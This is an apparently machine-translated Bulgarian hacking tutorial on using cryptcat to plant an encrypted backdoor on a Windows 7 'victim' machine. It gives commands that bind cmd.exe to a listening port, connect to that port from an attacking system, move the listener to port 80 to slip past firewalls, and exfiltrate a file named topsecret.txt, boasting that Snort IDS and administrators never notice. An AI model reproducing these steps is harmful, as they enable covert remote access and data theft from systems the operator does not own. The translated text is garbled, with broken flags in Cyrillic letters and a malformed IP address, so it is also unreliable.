Как се създава вратичка за cryptcat, което е почти невъзможно да се открие - isearch - efektivnosti Poshuk в
Cryptcat ни позволява да комуникират между двете системи, и шифрова връзката между тях чрез Twofish - един от многото отлични алгоритми за криптиране.
По-рано, когато се срещнахме с един малък netcat инструмент. която ви позволява да създадете връзка между две машини и трансфер на файлове, или да създадете черупка за системата "магистър". Въпреки красотата и елегантността на този малък инструмент, тя има един основен недостатък - предаване между компютри могат да бъдат открити чрез устройства за сигурност, като например защитни стени и системи за откриване на проникване (IDS).
В този урок се запознае с популярния братовчед на netcat, cryptcat (тя всъщност е много по-хубав и по-екзотични, отколкото просто netcat).
Тъй като криптиране Twofish е наравно с AES криптиране, го прави на практика cryptcat бронирано. По този начин, IDS не може да открие опасно поведение, дори когато неговите маршрути преминават през такива конвенционални HTTP-портове 80 и 443.
Стъпка 1: Изтеглете Cryptcat
Можете да изтеглите и инсталирате на вашата система Windows cryptcat тук.
Стъпка 2: Отворете слушателя на система Windows
Ние може да отвори слушателя на всяка система с подобен синтаксис за netcat. В нашия случай, ние сме отваряне на слушателя на Windows 7 система на порт 6996 и създаване на черупка.
cryptcat -L -р 6996 -e cmd.exe
-л означава "отворен слушане"
-р 6996 означава "да се постави на слушателя в порт 6996"
-д cmd.exe означава "да започне от командният ред за комуникация"
Сега, нека да тече от типа IDS Snort в друга система, която ще се свърже със системата Windows, за да се види дали криптиране е "сляп" на IDS е способен, оставяйки назад нашата врата невидима за такива устройства за сигурност.

Стъпка 4: Свързване към системата Windows с Cryptcat
Cryptcat по подразбиране на Backtrack. така че не е нужно да я изтеглите и инсталирате. В допълнение, той се намира в / кофата за боклук, за да можем да го достъп от всеки директория.
Сега се свържете към система Windows 7 cryptcat от нашия Backtrack система и да видим дали можем да извършите кодирана комуникационна вратичка, която е почти невъзможно да се открие.
cryptcat 192.168.4.182.248 6996

Както можете да видите, ние сме свързани с Windows 7 и има корпус от системата на Win 7! Това ни дава значителен контрол върху тази система, но не общо, защото черупката е с ограничен капацитет.
Стъпка 5: Proveote сумтене трупи и сигнали
Този тип атака (пасаж обвивка cherezh мрежа) лесно се открива чрез Snort или други IDS, когато съединението не е кодирано. Snort правила ще сигнализират на системния администратор, че cmd.exe черупка тече връзка с мрежата, и те са склонни да направят нещо, за да ви предпази от използването на тази черупка. С шифрована връзка, на разположение с cryptcat, тази връзка е почти невъзможно да се открие.
Нека се върнем и да се провери на дървените трупи и сигнали за Snort. Ако бяхме успешни в укриване на IDS, не трябва да видите предупредително съобщение за движението на обвивката по мрежата. Ние можем да тестваме нашите списания, ходи на / VAR / сумтене / сигналите и да проверите дали има някакви сигнали, поради връзката ни към машината Windows (обикновено, ние трябва да се намери предупреждение).

Както можете да видите, ние сме били успешни. Ние бяхме в състояние да се свърже към системата Windows, без да привличат вниманието на някое от устройствата за безопасност!
Стъпка 6: Изпрати Crypcat през порт 80, за да се избегне на защитната стена
Въпреки, че ние успешно са създали криптиран задната врата на система на жертвата, по-близък администратор сигурност ще забележите, че необичайно отворен порт (6996). Това най-вероятно да започне някакво действие на администратора по сигурността, за да ограничите достъпа ни. В допълнение, в системи с добър системен администратор и добра защитна стена, този порт може да бъде блокиран от защитна стена.
За да бъде в състояние да общуват в интернет всяка мрежа се очаква да се запази отворени портове 80 и 443, но също и, по възможност, 25, 53 и 110. Както в нормалния некриптиран Интернет трафик преминава през порт 80, което е почти винаги е отворена , лекото покачване на трафика едва ли забелязали.
Сега, ние успешно се използва cryptcat, ние го изпратите чрез порт 80 с останалата част от интернет трафика. Въпреки че е криптирана, но тя ще изглежда като всички двоични данни, предавани по линията. Затова тя ще бъде почти невъзможно да се открие устройства за сигурност, за да го блокира, тъй като те винаги трябва да се даде възможност на трафика на порт 80, а трафикът е криптирана и IDS няма да бъде в състояние да "виждат" на съдържанието.
Тук ние се премести файла от системата на жертвата с името topsecret.txt в нашия атакуващ система, без да го идентифицира с всяко устройство за сигурност. Този път, вместо да изпраща черупка чрез мрежата, ние ще изпратим най-таен файл с име topsecret.txt чрез нашата криптирана връзка. Ние можем да направим това, като напишете в командния ред на Windows:
cryptcat -L -р 80 -л означава "отворен слушане" cryptcat 192.168.182.248 80
-стр 80 е "отворен за слушане на порт 80"
<означает "отправить файл через этого слушателя"
Както можете да видите, файлът е преминал през нашата връзка е успешна!
Нека отново се провери нашите сумтене лог файлове за доказателство, че нашите IDS не е разкрила на строго секретно досие трафик.

Както можете да видите, нашата свръхсекретна файл се премества през пристанището 80 под носа на системните администратори, IDS, и защитната стена, без следа!
Cryptcat - това е чудесен малък инструмент за преместване на данни извън системата на жертвата чрез нормално отворени портове, без да бъдат открити от предпазните устройства.